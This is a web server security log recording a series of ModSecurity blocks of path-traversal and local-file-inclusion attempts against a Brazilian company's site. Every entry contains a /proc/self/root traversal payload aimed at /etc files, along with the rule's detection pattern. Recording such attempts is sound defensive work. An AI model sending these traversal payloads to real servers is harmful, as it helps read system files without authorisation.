[Wed Mar 18 05:55:57.868619 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:59268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abponcdf6f5d65gmYZSgpQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:56:15.966408 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:49126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpor9a6ubjKNq_cu4ZkeAAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:57:07.823103 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:50318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpo4wkwaGbbGflqUZDfsQAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:57:53.225613 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.243.128:55300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppEUzinOy1jxa1j4fg9QAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:58:45.843422 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:36116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppRSmAPhZkrhU8w4k9aQAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:47.128729 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:36130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppR0zinOy1jxa1j4fhDwAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:48.464473 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:36136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppSOoXxyEfFpUF8f87SgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:49.794272 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:40246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppSfu8EFLIOrSqIpvUjAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:51.240980 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:40254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppS9Y0UrI5A3LftIxllgAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:52.638965 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:40268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppTNY0UrI5A3LftIxllwAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:53.991912 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:40284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppTdY0UrI5A3LftIxlmQAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:55.358681 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:40290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppT9Y0UrI5A3LftIxlnQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:56.652841 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:40304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppUNY0UrI5A3LftIxloQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:57.948360 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:40308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppUew_le52K8_3pV2vuAAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:58:59.317665 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:40320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppUwkwaGbbGflqUZDf1AAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:00.657525 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:38776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppVNY0UrI5A3LftIxlpgAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:02.470830 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:38788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppVta6ubjKNq_cu4ZlGQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:03.834101 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:38794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppV-w_le52K8_3pV2vuwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:05.274615 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.243.128:38806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppWSmAPhZkrhU8w4k9cQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:06.679222 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:38818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppWuyqAr6etmhZHNqKQgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:08.018806 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:38832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppXPu8EFLIOrSqIpvUkgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
